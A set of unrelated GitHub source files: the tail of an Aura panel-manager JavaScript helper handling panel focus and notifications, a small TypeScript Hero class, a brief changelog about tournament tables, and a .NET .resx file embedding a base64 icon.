}
if (doActivateNext !== false) {
this.activateNextPanel(cmp);
}
// Set the return focus. This has to happen after activating the next panel (above), otherwise activate will steal the focus.
if (panel.closedBy !== "closeOnClickOut" &&
shouldReturnFocus === true && returnFocus) {
returnFocus.focus();
}
// this will happen if a panel is destroyed
// without being closed first
if(!panelObj.panel._transitionEndFired) {
var element = panelObj.panel && panelObj.panel.isValid() ? panelObj.panel.getElement() : null;
// listeners still need to know the panel is gone
$A.getEvt("markup://ui:panelTransitionEnd").setParams({
action: 'hide',
panelId: panelId,
hasGlassBackground: (element || document).querySelector(".modal-glass") !== null
}).fire();
}
},
/**
* Activate the candidate panel
* @param cmp
* @private
*/
activateNextPanel: function() {
//find the panel to active
for (var panel, i = this.PANELS_STACK.length - 1; i >= 0; i--) {
panel = this.PANELS_STACK[i];
if (panel && panel.isValid() && panel.get('v.visible') && !panel.destroyPending) {
panel.setActive(true);
break;
}
}
},
/**
* De-activate all the panels except the active one
* @param cmp
*/
deactivateAllPanelInstances: function(cmp, activePanel) {
for (var panel, i = this.PANELS_STACK.length - 1; i >= 0; i--) {
panel = this.PANELS_STACK[i];
if (panel && panel.isValid() && panel !== activePanel) {
panel.setActive(false);
}
}
},
/*
* Rendering the panel
* We call $A.render because we want to render the component immediately
* so we can send it back synchronously to the user
* @private
*/
renderPanelInstance: function (cmp, panel, config) {
this.containerManager.renderContainer(panel, config);
},
notifyPanelContent: function (content, config) {
var validInterface = config.typeOf ? content.isInstanceOf(config.typeOf) : true,
validMethod = content[config.action];
if (validInterface && validMethod) {
content[config.action](config.payload); // dispatch the method
}
},
broadcastNotify: function (cmp, source, config) {
var scope = config.scope,
currentTarget = config.currentTarget || this.getContainerPanelId(source),
stack = this.PANELS_STACK,
owner = this.PANELS_OWNER[currentTarget],
panel, content, i;
$A.assert(!scope || (scope !== 'all' || scope !== 'owner' || scope !== "self"), 'Invalid target (all || owner)');
if (scope === 'all') {
for (i = stack.length - 1; i >= 0; --i) {
panel = stack[i];
if (currentTarget !== panel.getGlobalId()) { // Dont notify itself
content = panel.get('v.body')[0];
this.notifyPanelContent(content, config);
}
}
} else if (scope === 'self') {
if (currentTarget) {
currentTarget = $A.getComponent(currentTarget);
this.notifyPanelContent(currentTarget.get('v.body')[0], config);
}
} else if (owner) {
var ownerCmp = $A.getComponent(owner);
if (ownerCmp && ownerCmp.isValid()) {
this.notifyPanelContent(ownerCmp, config);
}
}
},
getContainerPanelId: function (source) {
var provider = source;
while (provider) {
if (provider.isInstanceOf("ui:panelType")) {
return provider.getGlobalId();
}
source = provider.getAttributeValueProvider();
provider = source !== provider ? source : null;
}
},
/**
* Get a flag to indicate if we should close the panel when locationChange event is fired.
*/
getLocationChangeFlag: function (cmp, config) {
var closeOnLocationChange = config.closeOnLocationChange;
if ($A.util.isEmpty(closeOnLocationChange)) { // not set, get it from panel manager
closeOnLocationChange = $A.util.getBooleanValue(cmp.get('v.closeOnLocationChange'));
} else {
closeOnLocationChange = $A.util.getBooleanValue(closeOnLocationChange);
}
// add a handler if needed
if (closeOnLocationChange === true && this.hasLocationChangeHandler === false) {
var that = this;
$A.eventService.addHandler({
"event": "aura:locationChange",
"globalId": cmp.getGlobalId(),
"handler": function() {
for (var panel, panelObj, i = that.PANELS_STACK.length - 1; i >= 0; i--) {
panel = that.PANELS_STACK[i];
panelObj = that.PANELS_INSTANCE[panel.getGlobalId()];
if (panel && panel.isValid() && panelObj && panelObj.closeOnLocationChange === true) {
panel.close();
}
}
}
});
this.hasLocationChangeHandler = true;
}
return closeOnLocationChange;
},
/**
* Stack the element to be focused when the panel is destroyed.
* @param panelComponent
* @private
*/
pushReturnFocusElement: function(panel) {
var returnFocusElement = panel.get('v.returnFocusElement');
var util = this.focusLib.stackUtil;
if ($A.util.isUndefinedOrNull(returnFocusElement)) {
returnFocusElement = util.getRealActiveElement();
}
util.stackFocus(returnFocusElement);
},
/**
* return the element to be focused when the panel is destroyed.
* @param panel
* @param cmp
* @private
*/
popReturnFocusElement: function(panel) {
var selector = panel.get("v.returnFocusElementSelector");
var focusElement = this.focusLib.stackUtil.popFocus(panel);
if (selector) {
focusElement = document.querySelector(selector);
}
return focusElement;
}
})// eslint-disable-line semi
| {
"pile_set_name": "Github"
} |
export class Hero {
id: number;
name: string;
}
| {
"pile_set_name": "Github"
} |
Changelog
---------
* Adding several tables to create a schema structure for tournaments. Including a main tournament table,
* a participants and spectators table, a scoring table, and a games table.
Updating
---------
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
<data name="$this.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>
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
HP8IsR3/CLIe/wi0H/8ItB//CLQf/wi0H/8Isx7/CLEd/wivHP8JrBv/CakZ/wAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmk
Fv8Jphf/AAAAAAmrGv8JrBv/CK0b/wiuHP8Irhz/CK0b/wmsG/8Jqxr/AAAAAAmmF/8JpBb/AAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAACp4S/wqgE/8AAAAAAAAAAAmmF/8Jpxf/CacY/wmnGP8Jpxf/AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAACpoQ/wAAAAAAAAAAAAAAAAAAAAAKoRT/CqEU/wAAAAAAAAAAAAAAAAAA
AAAKmhD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/weD//8Hh///B
4f//weH//gHg//wBwJ/8AcDP/ADAT/gAgA/4QAGH+GABh/hgAIf4YAGH+CABB/gwAwf4MAMH/DACD/wA
